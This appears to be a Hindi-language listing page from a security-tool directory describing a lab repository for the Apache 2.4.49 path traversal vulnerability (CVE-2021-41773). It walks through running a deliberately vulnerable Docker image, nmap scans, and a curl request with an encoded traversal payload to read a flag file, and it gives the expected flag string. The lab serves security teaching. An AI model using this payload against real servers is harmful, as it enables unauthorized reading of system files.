Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
Log in
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

फ़ीडसंपर्कगोपनीयता© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
उपकरण/GitHubGitHub/m96dg/cve-2021-41773-exercise
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षालैब और अभ्यास
GitHubm96dg/cve-2021-41773-exercise

CVE-2021-41773-exercise

# Apache 2.4.49 पाथ ट्रैवर्सल (CVE-2021-41773) का शोषण करने के लिए हैंड्स-ऑन लैब Docker, Nmap स्कैनिंग और curl का उपयोग करके फ्लैग प्राप्त करने के लिए Apache 2.4.49 पाथ ट्रैवर्सल (CVE-2021-41773) का शोषण करने वाला हैंड्स-ऑन लैब।

रिपॉजिटरी देखें
94 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2021-41773-exercise

Apache HTTP Server 2.4.49 में पथ सामान्यीकरण (path normalization) में किए गए एक बदलाव में एक दोष पाया गया। एक हमलावर पथ ट्रैवर्सल अटैक (path traversal attack) का उपयोग करके Alias-जैसे निर्देशों द्वारा कॉन्फ़िगर किए गए निर्देशिकाओं के बाहर की फाइलों के लिए URL मैप कर सकता है। यदि इन निर्देशिकाओं के बाहर की फाइलें सामान्य डिफ़ॉल्ट कॉन्फ़िगरेशन "require all denied" द्वारा सुरक्षित नहीं हैं, तो ये अनुरोध सफल हो सकते हैं। यदि इन alias किए गए पथों के लिए CGI स्क्रिप्ट भी सक्षम हैं, तो यह रिमोट कोड एक्ज़ीक्यूशन (remote code execution) की अनुमति दे सकता है। यह समस्या केवल Apache 2.4.49 को प्रभावित करती है, पहले के संस्करणों को नहीं।

Credits intro to: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-41773

इस अभ्यास का उद्देश्य Apache 2.4.49 में मौजूद कमजोरी का शोषण करना है। इसका शोषण करने के लिए पूर्व-कॉन्फ़िगर किए गए फ़ोल्डरों के बाहर की फाइलों को मैप करने और एक प्रकार का रिमोट शेल (remote shell) बनाने के लिए "path traversal attack" का उपयोग करना आवश्यक है।

अभ्यास के लिए, docker hub पर उपलब्ध एक विशेष रूप से कमजोर docker का उपयोग करना सुविधाजनक है:

Link: https://hub.docker.com/r/m96dg/pw_apache_2_4_49

$docker pull m96dg/pw_apache_2_4_49

1_docker_pull

पुल किए गए docker की छवियों को देखने के लिए:

$docker images

Docker को पोर्ट 8080 पर चलाएं:

$docker run -dit -p 8080:80 m96dg/pw_apache_2_4_49

यह सत्यापित करने के लिए कि यह वास्तव में चल रहा है:

$docker ps

2_docker_run

जैसा कि देखा जा सकता है, वेब सर्वर पूरी तरह से कार्य कर रहा है:

3_8080

स्कैनिंग चरण (हम होस्ट से अधिक से अधिक जानकारी एकत्र करने का प्रयास करते हैं):

$nmap -sS -p- -T4 -Pn -oA portScan localhost

4_portScan

एन्यूमरेशन चरण (हम स्कैनिंग चरण में मिले पोर्ट्स को एन्यूमरेट करके जानकारी को गहरा करने का प्रयास करते हैं):

$nmap -sV -sC -oA versionScan localhost

5_versionScan

हमला करने के लिए, इस कमांड को चलाना और फ्लैग (flag) खोजने का प्रयास करना आवश्यक है (यदि यह रूट में डाला गया है):

$curl http://[IP]:8080/cgi-bin/.%2e/.%2e/.%2e/.%2e/flag.txt

6_exploit

यह सुनिश्चित करने के लिए कि अभ्यास सफल रहा है, और फ्लैग वास्तव में वही है जो मिला है, स्ट्रिंग की तुलना Md5 में इसके डिक्रिप्शन ("HaiTrovatoLaFlag_Apache") से करें। यदि दोनों स्ट्रिंग्स मेल खाती हैं, तो काम हो गया!

टूल डाउनलोड करें